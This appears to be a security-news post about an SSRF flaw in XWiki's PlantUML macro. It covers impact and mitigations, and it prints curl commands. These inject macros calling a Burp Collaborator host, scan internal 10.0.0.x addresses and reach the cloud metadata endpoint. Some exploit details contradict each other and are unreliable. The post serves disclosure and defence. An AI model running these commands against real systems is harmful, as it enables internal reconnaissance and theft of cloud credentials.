Listen to this Post
The vulnerability exists in the PlantUML Macro, a component that renders UML diagrams from simple text. The macro allows users to specify an alternative PlantUML server using the `server` parameter. However, versions prior to 2.4.1 do not validate the supplied URL. An attacker can leverage this by injecting a specially crafted URL into the `server` parameter. This URL can point to an internal IP address or a malicious external endpoint. The XWiki platform then attempts to connect to the attacker-controlled address to fetch the diagram. This action constitutes a Server-Side Request Forgery (SSRF) attack, as defined by CWE-918. The attack does not require any form of authentication or elevated privileges. The malicious request is sent directly from the vulnerable XWiki server. This allows an attacker to probe the internal network, bypassing traditional firewalls. The server’s request can be used to fingerprint or interact with internal services. For example, it could target a Redis instance, a Kubernetes API, or a cloud metadata service. The macro operates by performing an HTTP GET request to the concatenation of the host and path. An attacker could use this to exfiltrate data or launch further internal attacks. The attack is executed simply by viewing a wiki page containing the malicious macro. This makes it a potent vector for lateral movement within a network.
Platform: XWiki
Version: <2.4.1
Vulnerability :ServerSide RequestForgery
Severity: Moderate (4.4)
date: 2026-05-04
Prediction: 2026-05-15
Analytics under heading What Undercode Say:
Identify vulnerable instances curl -sk "https://target.xwiki/rest/wikis" | grep "version"
Test for SSRF using Burp Collaborator
curl -X POST "https://target.xwiki/bin/view/Main/" \
-d '{{plantuml server="http://burp.collaborator.net/ssrf"}}A->B: Test{{/plantuml}}'
Internal network scan via SSRF
for i in {1..254}; do
curl -sk "https://target.xwiki/bin/view/Main/" \
-d "{{plantuml server=\"http://10.0.0.$i:22\"}}A->B: Test{{/plantuml}}" \
| grep -q "Connection refused" || echo "Host 10.0.0.$i is reachable"
done
Exfiltrate AWS metadata
curl -sk "https://target.xwiki/bin/view/Main/" \
-d '{{plantuml server="http://169.254.169.254/latest/meta-data/"}}A->B: Test{{/plantuml}}'
Exploit:
To exploit the vulnerability, an attacker creates a new wiki page or modifies an existing one. The attacker inserts a PlantUML macro containing the malicious `server` parameter. The payload typically points to an internal resource, such as http://169.254.169.254/latest/meta-data/` for cloud metadata orhttp://internal-admin-panel:8080`. Upon saving and viewing the page, the XWiki server makes an HTTP GET request to the attacker-controlled URL. The attacker can then observe the response or use timing attacks to infer the presence of internal services. The exploit does not require any special privileges, making it a low‑complexity attack.
Protection from this CVE
Upgrade the macro-plantuml extension to version 2.4.1 or later. If an immediate upgrade is not possible, disable the PlantUML macro entirely. Alternatively, restrict outbound network access from the XWiki server using a firewall. Place the XWiki server in a DMZ to isolate it from internal networks. Use a Web Application Firewall (WAF) to block requests containing suspicious `server` parameters. Regularly audit wiki pages for malicious macro injections. Implement strict input validation for the `server` parameter, allowing only trusted domains.
Impact
An attacker can successfully exploit the SSRF vulnerability to probe internal network infrastructure. This allows the attacker to discover and interact with internal services that are not exposed to the public internet. Potential targets include internal databases, configuration management APIs, and cloud instance metadata services. By accessing the cloud metadata service, the attacker could retrieve instance credentials and temporary security tokens. The attacker may also use the vulnerability to perform port scans on internal hosts. This information can be used to pivot to other systems within the network. In the worst case, exploitation could lead to a full compromise of the internal environment.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
